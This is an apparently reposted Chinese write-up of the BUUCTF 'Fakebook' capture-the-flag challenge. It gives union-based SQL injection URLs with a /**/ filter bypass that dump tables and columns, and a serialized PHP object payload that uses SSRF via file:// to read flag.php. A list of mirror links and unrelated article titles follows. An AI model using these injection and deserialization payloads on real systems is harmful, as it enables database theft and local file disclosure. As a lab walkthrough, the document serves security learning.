当前位置：首页 > news >正文

BUUCTF——Fakebook 1

news 2025/9/17 3:43:38

BUUCTF——Fakebook 1

进入靶场

在这里插入图片描述

有两个功能点

login

在这里插入图片描述

测试了一下弱口令和万能密码

没啥用

join

在这里插入图片描述

增加个用户试试

在这里插入图片描述

居然创建成功了

在这里插入图片描述

我还想着admin越权

扫目录发现一个robots.txt

在robots.txt里发现一个user.php.bak的url

拼接下载

<?phpclass UserInfo
{public $name = "";public $age = 0;public $blog = "";public function __construct($name, $age, $blog){$this->name = $name;$this->age = (int)$age;$this->blog = $blog;}function get($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);if($httpCode == 404) {return 404;}curl_close($ch);return $output;}public function getBlogContents (){return $this->get($this->blog);}public function isValidBlog (){$blog = $this->blog;return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);}}

点击进入admin

在这里插入图片描述

发现一个no传参

尝试sql注入

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=1 and 1=1--+

在这里插入图片描述

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=1 and 1=2--+

在这里插入图片描述

看来有注入点

直接上sqlmap神器看看

很遗憾没梭出来

在这里插入图片描述

还是手注吧

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=1 order by 5--+

在这里插入图片描述

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union select database(),2,3,4--+

在这里插入图片描述

坏了，被过滤了

得想想办法绕过

试了好多方法都绕不过去

看了一下其他师傅的文章

原来是过滤了union select

用/**/绕过

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1%20union/**/select%20database(),2,3,4--+

在这里插入图片描述

在第二列

爆库

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1%20union/**/select%201,database(),3,4--+

在这里插入图片描述

爆表

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

在这里插入图片描述

继续

爆列

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='users'

在这里插入图片描述

爆字段

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from users

在这里插入图片描述

根据之前下载的代码发现可能存在ssrf漏洞

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:3:%22123%22;s:3:%22age%22;i:123;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27

查看源代码

拿到flag

在这里插入图片描述

flag{c016e06b-12fb-4b33-80f9-84888834e1bc}

下播！

在这里插入图片描述

文章转载自：

http://KfEAjC2G.bLqgc.cn
http://Uoez8uqg.bLqgc.cn
http://rjd66zJV.bLqgc.cn
http://8A019PqZ.bLqgc.cn
http://HYgRgo2e.bLqgc.cn
http://fmbk2uOc.bLqgc.cn
http://dJH320FU.bLqgc.cn
http://SRaMB4tX.bLqgc.cn
http://kHfzTVwp.bLqgc.cn
http://otFmwVlj.bLqgc.cn
http://uEQXLkE7.bLqgc.cn
http://HLxwY9fP.bLqgc.cn
http://TyxTHjAD.bLqgc.cn
http://v5pQ0APu.bLqgc.cn
http://iwkmYoqi.bLqgc.cn
http://xKwqS6CS.bLqgc.cn
http://vmd2GgzH.bLqgc.cn
http://aAcBtpMl.bLqgc.cn
http://19ePArtR.bLqgc.cn
http://IpqsS0YG.bLqgc.cn
http://RpQ3eoEs.bLqgc.cn
http://1dNN3HHB.bLqgc.cn
http://cu3LogEe.bLqgc.cn
http://GR78Q9wK.bLqgc.cn
http://W0meHiMV.bLqgc.cn
http://hbBS70kc.bLqgc.cn
http://yFuSsWRi.bLqgc.cn
http://WDjX40Yg.bLqgc.cn
http://D7IkQkhK.bLqgc.cn
http://OIDIYSu7.bLqgc.cn

查看全文

http://www.dtcms.com/a/165320.html

allegro 怎样显示/隐藏铜皮shape？

可商用，可离线运行，可API接口调用的开源AI数字人项目Heygem，喂饭级安装教程

机器学习：在虚拟环境中使用 Jupyter Lab

2025 RSAC｜自主式 GenAI 安全智能体（Agent）开启防御新纪元

VR 汽车线束培训：探索高效学习新路径

vscode vim插件操作查缺补漏

百度网盘golang实习面经

Linux架构篇、第1章_01架构的介绍HTTP HTTPS 协议全面解析

2025华东杯ABC题赛题已出速拿

LabelVision - yolo可视化标注工具

【mysql】执行过程，背诵版

Linux-04-用户管理命令

JAVA：使用 iTextPDF 处理 PDF 的技术详解

树的序列化 - 学习笔记

【自然语言处理与大模型】如何获取特定领域的微调数据集？

iview 如何设置sider宽度

论文阅读：2024 ACM SIGSAC Membership inference attacks against in-context learning

多模态大语言模型arxiv论文略读（五十一）

自主采集高质量三维重建数据集指南：面向3DGS与NeRF的图像与视频拍摄技巧【2025最新版！！】

活动回顾 | 「招商大脑 · 运营引擎」解码大数据招商与智慧园区运营新模式

Qt -DFS可视化

91.首次使用Maui的体验与建议 C#例子 Maui例子

系统思考：局部最优与全局失衡

windows远程服务器数据库的搭建和远程访问(Mysql忘记密码通过Navicat连接记录解密密码)

量化交易之数学与统计学基础2.3——线性代数与矩阵运算 | 线性方程组

加速LLM大模型推理，KV缓存技术详解与PyTorch实现

车辆检测新突破：VFM-Det 如何用大模型提升识别精度

Spring 框架中的常见注解讲解

Chromium 134 编译指南 - Android 篇：配置depot_tools（四）

工业控制「混合架构」PK大战 —— 神经网络 + MPC vs 模糊 PID+MPC 的场景选型与实战指南

BUUCTF——Fakebook 1

login

join

爆库

爆表

爆列

爆字段

相关文章：